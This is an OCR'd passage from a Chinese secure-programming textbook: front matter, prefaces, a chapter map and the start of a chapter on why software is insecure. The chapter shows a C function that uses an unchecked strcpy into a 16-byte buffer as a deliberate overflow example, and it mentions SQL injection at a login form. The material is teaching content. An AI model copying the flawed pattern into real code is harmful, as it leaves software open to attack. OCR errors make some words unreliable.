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内 容 简 介 


本 书 共 分 为 16 章 ,针对 安全 编程 技术 进行 讲解 ,主要 涵盖 了 基本 安全 编程 .应 用 安全 编程 .数据 
保护 编程 以 及 其 他 内 容 共 四 大 部 分 : 第 一 部 分 包含 内 存 安全 线程/ 进程 安全 、 异 常 /错误 处 理 安全 、 
输入 安全 ,第 二 部 分 包含 国际 化 安全 、 面 向 对 象 的 编程 安全 、Web 编程 安全 、 权 限 控制 .远程 调用 和 组 
件 安全 、 避 免 拒 绝 服务 攻击 等 内 容 , 第 三 部 分 包含 数据 加 密 保护 、 其 他 保护 ,数字 签名 等 内 容 , 最 后 一 
部 分 包含 软件 安全 测试 和 代码 性 能 调 优 。 每 章 后 面 都 有 配套 练习 ,用 于 对 本 章 进行 总 结 演练 。 

针对 安全 编程 技术 ,本 书 不 局 限于 某 一 门 特定 语言 ,而 是 将 编程 过 程 中 的 通用 安全 问题 进行 全 
面 总 结 ,逐步 引领 读者 从 基础 到 各 个 知识 点 进行 学 习 , 以 便 能 开发 出 安全 可 靠 的 系统 。 全 书 内 容 由 
浅 入 深 ,并 辅 以 大 量 的 实例 说 明 ,每 一 个 章节 以 实际 案例 为 起 点 进行 讲解 ,通俗 易 懂 。 

全 书 所 有 实例 的 源 代 码 均 可 在 清华 大 学 出 版 社 的 网 站 上 下 载 , 供 读者 学 习 参考 使 用 。 

本 书 可 作为 有 一 定编 程 基础 的 程序 员 的 学 习 用 书 ,也 可 供 有 经 验 的 开发 人 员 深入 学 习 使 用 ,更 
可 以 为 高 等 学 校 ,培训 班 作为 教材 使 用 ,对 于 缺乏 安全 编程 实战 经 验 的 程序 员 而 言 , 阅 读本 书 可 以 快 
速 积 累 经 验 , 提 高 编程 水 平 。 
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由 于 网 络 应 用 越 来 越 普及 ,信息 化 的 社会 已 经 呈现 出 越 来 越 广阔 的 前 景 , 可 以 肯定 
地 说 ,在 未 来 的 社会 中 电子 支付 ` 电 子 银行 ,电子 政务 以 及 多 方面 的 网 络 信息 服务 将 深 
入 到 人 类 生活 的 方方面面 。 同 时 , 随 之 面临 的 信息 安全 问题 也 日 益 突出 ,非法 访问 、 信 
息 窃 取 、 甚 至 信息 犯罪 等 恶意 行为 导致 信息 的 严重 不 安全 。 信 息 安全 问题 已 由 原来 的 
军事 国防 领域 扩展 到 了 整个 社会 ,因此 社会 各 界 对 信息 安全 人 才 有 强烈 的 需求 。 

信息 安全 本 科 专 业 是 2000 年 以 来 结合 我 国 特色 开设 的 新 的 本 科 专 业 , 是 计算 机 、 
通信 ,数学 等 领域 的 交叉 学 科 , 主 要 研究 确保 信息 安全 的 科学 和 技术 。 自 专业 创办 以 
来 ,各 个 高 校 在 课程 设置 和 教材 研究 上 一 直 处 于 探索 阶段 。 但 各 高 校 由 于 本 身 专 业 设 
置 上 来 自 于 不 同 的 学 科 , 如 计算 机 、 通 信和 数学 等 ,在 课程 设置 上 也 没有 统一 的 指导 规 
范 ,在 课程 内 容 、 深 浅 程度 和 课程 衔接 上 ,存在 模糊 不 清 、 内 容重 全、 知识 获 盖 不 全 面 等 
现象 。 因 此 ,根据 信息 安全 类 专业 知识 体系 所 覆盖 的 知识 点 ,系统 地 研究 目前 信息 安全 
专业 教学 所 涉及 的 核心 技术 的 原理 、 实 践 及 其 应 用 ,合理 规划 信息 安全 专业 的 核心 课 
程 ,在 此 基础 上 提出 适合 我 国信 息 安全 专业 教学 和 人 才 培 养 的 核心 课程 的 内 容 框 架 和 
知识 体系 ,并 在 此 基础 上 设计 新 的 教学 模式 和 教学 方法 ,对 进一步 提高 国内 信息 安全 专 
业 的 教学 水 平和 质量 具有 重要 的 意义 。 

为 了 进一步 提高 国内 信息 安全 专业 课程 的 教学 水 平和 质量 ,培养 适应 社会 经 济 发 
展 需 要 的 、 兼 具 研 究 能 力 和 工程 能 力 的 高 质量 专业 技术 人 次 。 在 教育 部 相关 教学 指导 
委员 会 专家 的 指导 和 建议 下 ,清华 大 学 出 版 社 与 国内 多 所 重点 大 学 共同 对 我 国信 息 安 
全 人 才 培 养 的 课程 框架 和 知识 体系 ,以 及 实践 教学 内 容 进行 了 深入 的 研究 ,并 在 该 基础 
上 形成 了 “信息 安全 人 才 需 求 与 专业 知识 体系 、 课 程 体系 的 研究 ”等 研究 报告 。 

本 系列 教材 是 在 课程 体系 的 研究 基础 上 总 结 、 完 善 而 成 ,力求 充分 体现 科学 性 、 先 
进 性 工程 性 ,突出 专业 核心 课程 的 教材 ,兼顾 具有 专业 教学 特点 的 相关 基础 课程 教材 ， 
探索 具有 发 展 潜力 的 选修 课程 教材 ,满足 高 校 多 层次 教学 的 需要 。 

本 系列 教材 在 规划 过 程 中 体现 了 如 下 一 些 基 本 组 织 原则 和 特点 。 

(1) 反映 信息 安全 学 科 的 发 展 和 专业 教育 的 改革 ,适应 社会 对 信息 安全 人 才 的 培 
养 需 求 ,教材 内 容 坚持 基本 理论 的 扎实 和 清晰 ,反映 基本 理论 和 原理 的 综合 应 用 ,在 其 
基础 上 强调 工程 实践 环节 ,并 及 时 反映 教学 体系 的 调整 和 教学 内 容 的 更 新 。 

(2) 反映 教学 需要 ,促进 教学 发 展 。 教 材 要 适应 多 样 化 的 教学 需要 ,正确 把 握 教 学 
内 容 和 课程 体系 的 改革 方向 ,在 选择 教材 内 容 和 编写 体系 时 注意 体现 素质 教育 、 创 新 


多 鸭 件 安全 实现 一 安全 编程 技术 
能 力 与 实践 能 力 的 培养 ,为 学 生 知识 、 能 力 ,素质 协调 发 展 创造 条 件 。 

(3) 实施 精品 战略 ,突出 重点 。 规 划 教材 建设 把 重点 放 在 专业 核心 (基础 ?课程 的 
教材 建设 上 ; 特别 注意 选择 并 安排 一 部 分 原来 基础 比较 好 的 优秀 教材 或 讲义 修订 再 
版 ,逐步 形成 精品 教材 ; 提倡 并 鼓励 编写 体现 工程 型 和 应 用 型 的 专业 教学 内 容 和 课程 
体系 改革 成 果 的 教材 。 

(4) 支持 一 纲 多 本 ,合理 配套 。 专 业 核心 课 和 相关 基础 课 的 教材 要 配套 ,同一 门 课 
程 可 以 有 多 本 具有 各 自 内 容 特 点 的 教材 。 处 理 好 教材 统一 性 与 多 样 化 ,基本 教材 与 辅 


助教 材 教学 参考 书 ,文字 教材 与 软件 教材 的 关系 ,实现 教材 系列 资源 的 配套 。 


(5) 依靠 专家 ,择优 落实 。 在 制定 教材 规划 时 依靠 各 课程 专家 在 调查 研究 本 课程 


教材 建设 现状 的 基础 上 提出 规划 选 题 。 在 落实 主编 人 选 时 ,要 引入 竞争 机 制 ,通过 申 
， 报 、 评 审 确定 主编 。 书 稿 完成 后 认真 实行 审 稿 程序 ,确保 出 书 质量 。 


繁荣 教材 出 版 事业 ,提高 教材 质量 的 关键 是 教师 。 建 立 一 支 高 水 平 的 ,以 老 带 新 的 


教材 编写 队伍 才能 保证 教材 的 编写 质量 ,希望 有志 于 教材 建设 的 教师 能 够 加 入 到 我 们 


的 编写 队伍 中 来 。 


21 世纪 高 等 学 校 信息 安全 专业 规划 教材 
联系 人 : 魏 江 江 weijj@tup. tsinghua. edu. cn 
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安全 编程 技术 是 一 门 学 科 , 涵盖 的 编程 语言 较 多 ,所 需要 讨论 的 问题 也 较 广 ,因此 ， 
目前 对 于 安全 编程 技术 的 讲解 很 容易 陷入 误区 : 要 么 只 是 针对 某 一 门 语言 讲解 安全 问 
题 ; 要 么 泛泛 而 谈 , 缺 乏 具 体 案例 。 本 书 针对 编程 中 常见 的 安全 问题 进行 了 阐述 ,不 局 
限于 某 一 门 特定 语言 ,但 是 每 一 个 话题 却 以 简单 .通俗 . 易 懂 的 案例 进行 讲解 ,逐步 引领 
读者 从 基础 到 各 个 知识 点 进行 学 习 , 从 而 开发 出 安全 可 靠 的 系统 。 本 书 涵盖 了 内 存 安 
全 ,线程 /进程 安全 、 异 常 /错误 处 理 安全 ,输入 安全 、 国 际 化 安全 、 面 向 对 象 的 编程 安全 、 
Web 编程 安全 、 权 限 控制 .远程 调用 和 组 件 安全 、 避 免 拒 绝 服务 攻击 、 数 据 加 密 保 护 、 数 
字符 名 ,安全 测试 和 程序 性 能 调 优等 内 容 。 每 章 后 面 都 有 配套 练习 ,用 于 对 本 章 内 容 进 
行 总 结 演练 。 

1. 本 书 的 知识 体系 

学 习 本 书 ,需要 具有 一 定 的 编程 基础 ,至 少 要 对 常见 语言 ,如 C++、. NET、Java 有 
所 了 解 。 

本 书 的 知识 体系 结构 如 图 1 所 示 ,遵循 循序 渐进 的 原则 ,逐步 引领 读者 从 基础 到 各 
个 知识 点 的 学 习 。 


第 一 部 分 : 概述 
第 1 章 : 安全 编程 概述 


第 二 部 分 : 基本 安全 编程 
第 2 章 : 内 存 安全 
第 3 章 : 线程 /进程 安全 
第 4 章 : 异常 /错误 处 理 中 的 安全 


第 三 部 分 : 应 用 安全 编程 
第 6 章 : 国际 化 安全 
第 7 章 : 面向 对 象 中 的 编程 安全 
第 8 章 : Web 编程 安全 
第 9 章 : 权限 控制 
第 10 章 : 远程 调用 和 组 件 安全 
第 11 章 : 避免 拒绝 服务 攻击 


第 5 章 : 输入 安全 


第 四 部 分 : 数据 保护 编程 
第 12 章 : 数据 的 加 密 保护 
第 13 章 : 数据 的 其 他 保护 
第 14 章 : 数字 签名 


第 五 部 分 : 其 他 问题 
第 15 章 : 软件 安全 测试 
第 16 章 : 程序 性 能 调 优 
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2. 章节 内 容 介绍 

全 书 共 分 为 16 章 。 

第 1 章 首先 讲解 软件 安全 的 概念 ,然后 引出 安全 编程 技术 讨论 的 话题 。 

第 2 章 介绍 编程 中 的 内 存 安全 ,如 溢出 、 字 符 串 操作 等 。 

第 3 章 介绍 编程 中 的 线程 和 进程 安全 ,对 线程 同步 .协作 、 死 锁 等 安全 问题 问题 进 


| 行 讲解 。 


第 4 章 介绍 异常 和 错误 处 理 中 的 安全 ,从 异常 的 出 现 到 异常 的 捕捉 和 处 理 进行 安 
全 方面 的 讲解 。 
第 5 章 讲述 输入 安全 ,包括 普通 输入 安全 数据库 输 入 安全 以 及 文件 访问 中 的 一 


。 些 安全 问题 。 


第 6 章 为 国际 化 安全 ,讲解 国际 化 过 程 中 的 编码 和 溢出 问题 。 
第 7 章 讲解 面向 对 象 编程 中 的 安全 问题 。 
第 8 章 介绍 Web 编程 安全 ,涵盖 了 目前 常见 的 Web 编程 安全 中 的 常见 问题 ,如 


”URL 操作 安全 、 跨 站 脚本 、SQL 注入 等。 


第 9 章 针对 权限 控制 中 的 安全 问题 进行 详细 讲解 。 

第 10 章 首先 讲解 远程 调用 安全 ,然后 讲解 组 件 安全 ,涵盖 了 Java 和 . NET 体系 中 
常见 组 件 标准 的 安全 问题 讲解 。 

第 11 章 讲解 拒绝 服务 攻击 的 避免 方法 。 

第 12 章 针对 数据 保护 ,讲解 加 密 技 术 。 

第 13 章 讲解 数据 的 其 他 保护 措施 。 

第 14 章 介绍 数据 保护 的 另 一 个 技术 : 数字 签名 的 实现 。 

第 15 章 针对 测试 人 员 ,讲解 软件 安全 测试 。 

第 16 章 讲解 程序 性 能 调 优 ,严格 讲 这 不 是 安全 编程 技术 的 范围 ,但 是 可 以 为 编写 
安全 的 系统 提供 帮助 。 

本 书 可 作为 有 一 定编 程 基 础 的 程序 员 的 学 习 用 书 , 也 可 供 有 经 验 的 开发 人 员 深 入 


学 习 使 用 ,更 可 以 为 高 等 学 校 ,培训 班 作为 教材 使 用 ,对 于 缺乏 安全 编程 实战 经 验 的 程 


序 员 来 说 ,可 用 来 快速 提高 编程 水 平 。 

全 书 所 有 实例 的 源 代 码 均 可 在 清华 大 学 出 版 社 的 网 站 上 下 载 , 供 读者 学 习 参 考 , 所 
有 程序 均 经 过 了 作者 精心 的 调试 。 
由 于 时 间 仓 促 和 作者 的 水 平 有 限 , 书 中 的 错误 和 不 妥 之 处 在 所 难免 , 敬 请 读者 批评 


有 关 本 书 的 意见 反馈 和 咨询 ,读者 可 在 清华 大 学 出 版 社 网 站 的 相关 栏目 中 与 作者 


”进行 交流 。 


本 书 配套 光盘 中 的 内 容 ,读者 也 可 以 在 清华 大 学 出 版 社 网 站 下 载 。 


作 者 
2010 年 3 月 
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| 


1.3 


是 和 和 全 天 妆 攻 人 


2.2 


郑 


下 下 任何 软件 都 是 不 安全 的 … 

1.1.2 软件 不 安全 性 的 几 种 表现 … 
1.1.3 软件 不 安全 的 原因 …*……… 
1.2.3 软件 的 安全 性 测试 … 
1.2.4 漏洞 响应 和 产品 的 维护 ， 
本 书 的 内 容 … 
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第 章 


安全 编程 概述 


现代 生活 中 ,计算 机 的 应 用 已 经 越 来 越 广泛 ,给 人 们 的 生活 带 来 了 巨大 的 方便 。 计 
算 机 系统 的 安全 问题 也 越 来 越 受到 重视 。 软 件 , 是 组 成 计算 机 应 用 的 一 个 重要 部 分 , 当 
软件 由 于 不 安全 而 遭受 攻击 ,或 者 运行 期 间 出 现 错误 时 ,会 给 用 户 带 来 巨大 的 损失 。 如 
犯罪 分 子 利用 软件 漏洞 来 获取 有 价值 的 信息 ,用 于 牟取 利益 ; 又 如 软件 因为 开发 时 没 
有 考虑 运行 时 的 具体 情况 ,而 造成 运行 的 突然 崩溃 ,等 等 。 

越 来 越 频繁 的 软件 安全 隐患 对 软件 的 开发 者 一 软件 工程 师 , 提 出 了 更 高 的 要 求 ， 
要 求 程序 员 能 够 编写 出 错误 较 少 的 程序 ,并 且 能 够 及 时 修复 软件 出 现 的 突 发 问题 ,切实 
为 软件 使 用 者 服务 。 本 书 讲解 的 安全 编程 技术 主要 就 是 针对 这 些 问 题 。 安 全 编程 是 软 
件 质量 的 重要 保证 ,在 软件 开发 和 程序 设计 中 具有 重要 地 位 。 

不 过 ,实际 的 软件 工程 中 ,安全 隐患 的 出 现 往往 来 源 于 多 个 方面 ,给 软件 系统 带 来 
的 危害 也 是 多 方面 的 。 安 全 问题 的 出 现 原因 众多 ,而 某 些 安全 问题 又 具有 不 间断 发 生 ， 
难于 调试 等 特点 ,因此 ,很 难 用 一 个 单纯 的 理论 来 完全 地 冰 述 安全 编程 问题 。 基 于 这 个 
考虑 ,安全 编程 的 内 容 只 能 针对 各 个 侧面 来 进行 六 述 , 如 异常 情况 下 的 安全 、 线 程 操作 
中 的 安全 、 数 据 安 全 加 密 等 。 

本 章 主 要 针对 安全 问题 进行 概述 ,首先 讲解 软件 安全 问题 出 现 的 原因 ,然后 冰 述 软 
件 安 全 问题 的 一 些 表 现 , 并 对 安全 问题 进行 分 类 , 接 下 来 基于 软件 开发 生命 周期 ,对 软 
件 工 程 中 的 安全 问题 进行 详细 介绍 ,最 后 介绍 本 书 的 内 容 。 


1.1 软件 的 安全 问题 


1.1.1 任何 软件 都 是 不 安全 的 


进入 21 世纪 , 随 着 计算 机 应 用 的 普及 ,软件 在 人 们 的 生活 中 已 经 渐渐 成 为 一 个 较 
为 普及 的 概念 ,软件 也 给 人 们 的 生活 带 来 了 巨大 的 方便 。 在 日 常生 活 中 ,人 们 几乎 是 随 
时 都 可 以 用 到 软件 ,如 : 

。 购物 后 结账 时 ,商场 收银 台 上 运行 的 就 是 能 够 自动 计算 总 价 的 软件 ; 
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。 用 手机 进行 通信 时 ,手机 中 运行 的 是 手机 操作 系统 软件 ; 
。 在 ATM 上 取款 时 ,ATM 中 运行 的 是 支持 取款 的 一 系列 软件 ; 
| 。 订 飞机 票 时 ,也 必须 借助 于 飞机 订 票 软件 ,等 等 。 
人 和 对 于 普通 用 户 来 讲 , 这 些 软件 的 安全 性 可 能 还 得 不 到 完全 的 重视 ,或 者 不 会 有 一 个 
， 感性 认识 ; 一 旦 软件 出 现 安全 问题 ,用 户 也 不 能 解决 。 对 于 用 户 来 讲 , 这 些 安全 问题 的 
上 由 型 表现 如 下 
。 使 用 某 些 交易 软件 的 过 程 中 , 某 些 敏感 信息 ,如 个 人 身份 信息 、 个 人 卡号 密码 等 
信息 被 敌 方 获取 并 用 于 牟利 ; 
访问 某 些 网 站 时 ,服务 器 响应 很 慢 , 或 者 服务 器 由 于 访问 量 造成 负载 过 大 ,造成 
突然 瘫 疯 ; 
自己 的 系统 中 安装 了 具有 漏洞 的 软件 ,漏洞 没有 解决 , 敌 方 找 到 漏洞 并 对 本 机 
进行 攻击 ,造成 系统 瘫痪 ; 
自己 花费 精力 完成 了 一 幅 漂亮 的 风景 画 , 放 到 网 上 去 ,没有 考虑 版 权 , 被 他 人 随 
意 使 用 却 无 法 问 责 , 等 等 。 
因此 ,这 些 安全 问题 应 该 在 软件 开发 过 程 中 就 充分 为 用 户 考虑 到 。 
| 在 新 的 时 期 ,对 软件 的 开发 提出 了 两 个 新 的 要 求 : 加 强 软 件 复杂 性 和 提高 可 扩展 
”性 要 求 。 这 两 个 要 求 促进 了 软件 工程 应 用 和 研究 的 发 展 ,但 是 也 使 软件 安全 变 得 更 富 
”有 挑战 性 : 
| 。 一 方面 ,软件 复杂 了 ,安全 问题 也 很 复杂 ,无 法 得 到 全 面 的 考虑 ,而 工程 进度 又 
迫使 开发 者 不 得 不 在 一 定时 间 内 交付 产品 ,代码 越 多 漏洞 和 缺陷 也 就 越 来 
越 多 ; 
。 另 一 方面 ,软件 的 可 扩展 性 要 求 越 来 越 高 ,系统 升级 和 性 能 扩展 成 为 很 多 软件 
必 备 的 功能 ; 可 扩展 性 好 的 系统 ,由 于 其 能 够 用 较 少 的 成 本 实现 功能 扩充 , 受 
到 开发 者 和 用 户 的 欢迎 ; 但 针对 可 扩展 性 必须 进行 相应 的 设计 ,软件 结构 变 得 
复杂 。 添 加 新 的 功能 ,也 引入 了 新 的 风险 。 
怎样 解决 这 些 安全 问题 ? 
首先 ,大 多 数 人 可 以 想到 的 方法 是 软件 测试 ,通过 测试 来 减少 软件 中 的 缺陷 。 但 
是 ,由 于 软件 系统 规模 越 来 越 大 ,软件 开发 的 进度 要 求 越 来 越 高 ,不 可 能 在 有 限 的 时 间 
， 内 考虑 所 有 安全 方面 的 问题 ,即使 进行 了 全 方位 的 测试 ,也 只 能 覆盖 所 有 测试 案例 中 的 
， 很 小 一 部 分 。 
| 如 图 1-1 所 示 ,模块 A 使 用 模块 B 和 模块 C ,以 黑 盒 测试 为 例 , 如 果 模 块 A 的 输入 
有 X 种 ,模块 也 的 输入 有 工种 ,模块 C 的 输入 有 2Z 种 ， 
理论 上 讲 .应 该 对 XXYXZ 个 组 合 进行 全 面 的 测试 。 


模块 4 ”=| ”模块 B 


pr 但 是 ,由 于 工程 进度 问题 ,实际 上 在 测试 时 不 可 能 兼顾 

全 面 ,往往 只 是 采用 了 一 些 具 有 代表 性 的 测试 案例 来 进 
| ot 行 测试 ,但 这 些 测试 案例 在 设计 的 时 候 又 不 能 保证 具有 
最 全 面 的 代表 性 。 如 果 想 要 将 所 有 问题 考虑 到 ,除非 进行 穷 举 测试 ,而 这 种 穷 举 测试 基 
。 本 上 是 不 可 能 完成 的 。 


因此 ,软件 测试 无 法 完全 保证 软件 的 安全 性 。 一 方面 是 想 要 实现 全 面 的 测试 , 找 出 
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全 部 的 错误 , 另 一 方面 又 要 保证 工程 的 进度 ,早日 解决 用 户 的 问题 ,这 往往 无 法 两 全 ,只 
能 在 其 中 找到 平衡 点 。 

关于 测试 , 另 一 个 问题 是 ,全 面 的 测试 ,一 般 情况 下 是 针对 所 有 可 能 出 现 的 隐患 进 
行 测试 ,但 是 这 需要 对 软件 的 隐患 具有 全 方位 的 预见 性 。 而 在 有 些 情况 下 ,很 多 隐患 是 
在 运行 期 间 才 显露 出 来 的 ,软件 的 开发 者 很 难 在 开发 阶段 预见 到 所 有 可 能 出 现 的 隐患 ，， 
容易 让 测试 陷入 盲目 。 

因此 ,测试 只 能 减少 软件 安全 问题 的 发 生 , 但 是 不 能 完全 解决 安全 问题 。 业 界 大 都 
公认 一 个 事实 : 几乎 所 有 的 软件 都 带 着 安全 隐患 投入 运行 。 | 

这 里 可 以 得 出 一 个 结论 : 任何 软件 都 是 不 安全 的 。 包 括 进行 了 广泛 测试 的 知名 的 
接口 .协议 (如 TCP/IP) ,很 多 情况 下 都 成 为 攻击 的 目标 。 

另外 ,从 技术 方面 来 讲 , 软 件 的 安全 问题 (如 缓冲 区 游 出、 异常 处 理 不 当 、 线 程 同 步 
问题 没有 考虑 等 ) 是 普遍 存在 的 ,考虑 了 一 个 方面 ,可 能 没 考虑 另 一 个 方面 ,黑客 总 可 以 
采取 种 种 手段 人 侵 , 让 用 户 防不胜防 。 


3 提示 “以 网 络 软 件 为 例 , 黑 客 可 能 通过 因特网 获得 未 授权 的 访问 的 信息 ,或 者 利 
用 软件 缺陷 来 控制 用 户 系 统 并 展开 攻击 。 随 着 网 络 应 用 的 更 加 丰富 ,用 户 对 网 络 服 
务 的 依赖 也 相应 增加 (如 网 上 银行 \ 网 上 股票 \ 网 上 游戏 等 ) ,这 也 导致 了 入 侵 的 方法 
的 增加 和 复杂 化 ,从 而 使 得 安全 问题 更 加 凸显 出 来 。 而 软件 工程 师 无 法 在 开发 阶段 
就 预见 到 全 部 的 攻击 ,并 且 会 提高 软件 开发 的 难度 。 所 谓 “ 防 不 胜 防 ”, 就 是 这 个 
道理 。 

另 一 个 解决 安全 问题 的 方法 可 能 就 是 在 测试 前 就 尽量 多 地 解决 安全 隐患 。 在 设 
计 、 编 码 阶段 ,熟练 的 软件 设计 人 员 和 软件 工程 师 完全 可 以 尽 可 能 多 地 将 安全 问题 
进行 考虑 并 加 以 解决 。 如 果 在 程序 设计 的 时 候 就 能 够 尽量 考虑 安全 问题 ,对 软件 
的 安全 性 也 就 会 有 更 好 的 保证 ,可 以 大 大 减 小 测试 的 负担 。 这 就 是 本 书 所 阐述 的 
内 容 。 

近年 来 ,不 管 是 在 应 用 方面 还 是 在 研究 方面 ,安全 编程 技术 越 来 越 受 到 重视 ,本 书 
将 针对 该 话题 中 的 若干 方面 进行 讲述 。 


1.1.2 软件 不 安全 性 的 几 种 表现 


软件 的 不 安全 性 ,一 般 情况 下 的 受害 者 就 是 其 直接 用 户 。 从 用 户 的 角度 来 看 ,软件 ， 
的 不 安全 性 主要 体现 在 两 个 方面 。 
(1) 软件 在 运行 过 程 中 不 稳定 ,出 现 异常 现象 ,得 不 到 正常 结果 或 者 在 特殊 情况 下 
由 于 一 些 原因 造成 系统 崩溃 。 比 如 : 
。， 由 于 异常 处 理 不 当 , 软 件 运行 期 间 遇 到 突 发 问题 ,处 理 异 常 之 后 无 法 释放 资源 ， 
导致 这 些 资源 被 锁定 无 法 使 用 ; 
。 由 于 线程 处 理 不 当 , 软 件 运 行 中 得 不 到 正常 结果 ; | 
。 由 于 网 络 连接 处 理 不 当 , 网 络 软件 运行 过 程 中 ,内 存 消耗 越 来 越 大 ,系统 越 来 越 
慢 , 最 后 崩溃 ; 
* 由 于 编程 没有 进行 优化 ,程序 运行 消耗 资源 过 大 ,等 等 。 
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(2) 黑客 利用 各 种 方式 达到 窃取 信息 ,破坏 系统 等 目的 。 比 如 : 

。 黑客 通过 一 些 手段 获取 数据 库 中 的 明文 密码 ; 

。 黑客 利用 软件 的 缓冲 区 溢出 ,运行 敏感 的 函数 ; 

。 黑 客 利用 软件 对 数据 的 校 验 不 全 面 ,给 用 户 发 送 虚 假 信息 ; 

。 黑 客 对 用 户 进行 拒绝 服务 攻击 ,等 等 。 

通常 情况 下 ,大 多 数 安全 问题 在 软件 运行 的 过 程 中 发 生 , 而 负责 软件 系统 运行 的 


， 技术 管理 人 员 或 者 软件 的 个 人 用 户 , 并 不 是 专业 的 软件 开发 人 员 。 此 时 他 们 往往 无 
| 法 给 出 直接 的 应 对 方案 ,虽然 可 以 依靠 一 些 简 单 的 方法 ,如 优化 操作 系统 、 优 化 网 
” 络 , 优 化 数据 库 管理 系统 或 者 设置 额外 的 操作 权限 来 对 付 这 些 剧 增 的 安全 问题 ,但 


是 实际 上 ,这 些 方法 都 是 治标 不 治本 的 方法 。 此 时 ,就 需要 投入 大 量 的 成 本 来 进行 
软件 的 维护 。 


1.1.3 软件 不 安全 的 原因 


软件 出 现 安全 隐患 ,并 造成 损失 ,一 方面 是 由 于 黑客 的 猩 儿 ,但 是 从 开发 者 角度 , 几 
乎 都 有 一 个 共同 的 基本 原因 : 那 就 是 由 于 软件 在 设计 、 编 码 ,测试 和 运行 阶段 ,没有 发 


现 软件 中 的 各 种 漏洞 ,导致 软件 的 不 安全 。 


从 严格 的 定义 上 来 讲 ,软件 安全 隐患 一 般 可 以 分 为 两 类 : 错误 和 缺陷 。 错 误 是 指 
软件 实现 过 程 出 现 的 问题 ,大 多 数 的 错误 可 以 很 容易 发 现 并 修复 ,如 缓冲 区 溢出 、 死 锁 、 
不 安全 的 系统 调用 、 不 完整 的 输入 检测 机 制 和 不 完善 的 数据 保护 措施 等 ; 缺陷 是 一 个 
更 深层 次 的 问题 , 它 往往 产生 于 设计 阶段 并 在 代码 中 实例 化 且 难 于 发 现 , 如 设计 期 间 的 


功能 划分 问题 等 ,这 种 问题 带 来 的 危害 更 大 ,但 是 不 属于 编程 的 范畴 。 业 内 一 般 将 这 两 


个 概念 放 在 一 起 讲 , 通 常 不 去 刻意 区 分 错误 和 缺陷 ,本 书 也 沿袭 这 一 做 法 。 

下 面 阐述 软件 不 安全 的 原因 。 首 先 ,站 在 软件 开发 者 的 角度 ,软件 不 安全 的 原因 可 
以 归纳 为 以 下 几 种 。 

(1) 软件 生产 没有 严格 遵守 软件 工程 流程 。 由 于 缺乏 经 验 或 者 主观 (如 片面 追求 
高 进度 ) 的 原因 ,软件 的 设计 者 和 开发 者 没有 一 个 统一 的 管理 ,可 以 在 软件 开发 周期 的 


任意 时 候 ,随意 删除 、 新 增 或 者 修改 软件 需求 规格 说 明 书 、 威 胁 模型 .设计 文档 、 源 代 
| 码 、 整 合 框架 ,测试 用 例 和 测试 结果 、 安 装配 置 说 明 书 ,使 得 软件 的 安全 性 保证 大 大 
”减弱 。 


大 多 数 系统 软件 或 其 他 商业 软件 ,结构 都 相当 大 并 且 复 杂 , 而 且 由 于 考虑 到 软件 的 


扩展 性 ,它们 的 设计 更 巧妙 ,也 更 复杂 。 在 运行 的 过 程 中 ,这 些 系统 又 可 以 在 大 量 不 同 


的 状态 之 间 转 换 , 这 个 特性 使 得 开发 和 使 用 持续 正常 运行 的 软件 ,是 一 件 很 困难 的 事 


情 , 更 不 用 说 持续 安全 运行 了 。 面 对 不 可 避免 的 安全 威胁 和 风险 ,项 目 经 理 和 软件 工程 


师 必 须 从 开发 流程 做 起 ,让 安全 性 贯穿 整个 软件 开发 的 始终 。 就 大 多 数 相 对 成 功 的 软 


件 工程 案例 而 言 ,如 果 在 软件 缺陷 方面 对 项 目 经 理 和 软件 工程 师 进行 系统 的 培训 ,可 以 
| 避免 软件 的 许多 安全 缺陷 。 


(2) 编程 人 员 没有 采用 科学 的 编程 方法 。 在 软件 开发 的 过 程 中 没有 考虑 软件 可 能 
出 现 的 问题 .仅仅 将 能 够 想到 的 安全 问题 停留 在 实验 室内 进行 解决 。 实 际 上 ,有 些 程 


， 序 ,在 实验 室 阶段 根本 不 会 出 现 安全 隐患 ,如 下 代码 ; 
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加 | 


void function(char * input) 
{ 
char buffer[16]; 
strcpy(buffer, input) ; 


} 


表示 将 input 字符 串 拷 贝 到 buffer 中 ,即使 在 开发 阶段 的 测试 过 程 中 让 这 个 函数 
产生 缓冲 区 溢出 ,也 不 会 产生 攻击 效果 。 只 有 在 精心 设计 之 后 , 才 可 能 对 系统 造成 攻 
击 。 因 此 在 开发 阶段 很 难 意识 到 这 个 问题 ,使 得 软件 留 下 安全 隐患 。 | 

(3) 测试 不 到 位 (不 过 有 时 是 无 法 到 位 )。 主 要 是 测试 用 例 的 设计 无 法 涵盖 尽 可 能 
典型 的 安全 问题 。 如 图 1-2 所 示 的 登录 表单 。 

一 般 测 试用 例 只 是 设计 输入 正确 的 用 户 名 和 密 ”用户 名 
码 , 看 能 否 正常 登录 ; 再 输入 错误 的 用 户 名 和 密码 ,看 


密码 
能 否 得 到 相应 的 错误 提示 。 但 是 攻击 者 如 果 输 入 某 些 
和 SQL 注入 有 关 的 值 ,就 有 可 能 在 不 需要 知道 用 户 名 一 全 录 
和 密码 的 情况 下 登录 到 系统 ,甚至 知道 系统 中 的 其 他 图 12 


信息 或 对 系统 中 的 内 容 进 行 修改 。 

从 软件 工程 客观 角度 讲 , 软 件 的 安全 性 隐患 又 来 源 于 以 下 几 个 方面 : 

(1) 软件 复杂 性 和 工程 进度 的 平衡 。 如 前 一 节 所 述 , 软 件 规模 复杂 了 ,不 仅仅 是 纺 
码 工作 量 的 提高 ,更 重要 的 是 其 中 需要 考虑 的 问题 更 加 复杂 ,测试 用 例 规模 也 呈 指 数 级 
增长 。 但 是 工程 进度 只 是 按照 软件 规模 进行 适当 的 延长 ,因此 很 多 问题 来 不 及 解决 , 软 
件 带 着 缺陷 投入 使 用 。 | 

(2) 安全 问题 的 不 可 预见 性 。 主 要 是 软件 工程 师 对 运行 的 实际 情况 不 了 解 ,在 测 
试 时 作出 过 于 简单 的 假设 。 有 些 问题 ,包括 对 软件 的 功能 ,输出 和 软件 运行 环境 的 行为 
状态 ,或 者 外 部 实体 (用 户 、 软 件 进程 ) 的 预期 输入 ,都 无 法 完全 考虑 到 ,而 入 侵 者 有 足够 
的 时 间 进 行人 侵 方法 的 研究 。 

(3) 由 于 软件 需求 的 变动 。 软 件 规格 说 明 书 或 设计 文档 无 法 一 开始 就 确定 下 来 ; 
在 现代 软件 工程 中 ,很 多 软件 的 需求 变动 ,导致 其 设计 本 来 就 是 变动 的 ,很 多 安全 问题 ， 
可 能 在 变动 的 过 程 中 被 忽略 。 | 

(4) 软件 组 件 之 间 的 交互 的 不 可 预见 性 。 如 客户 可 能 在 运行 软件 的 过 程 中 ,自行 
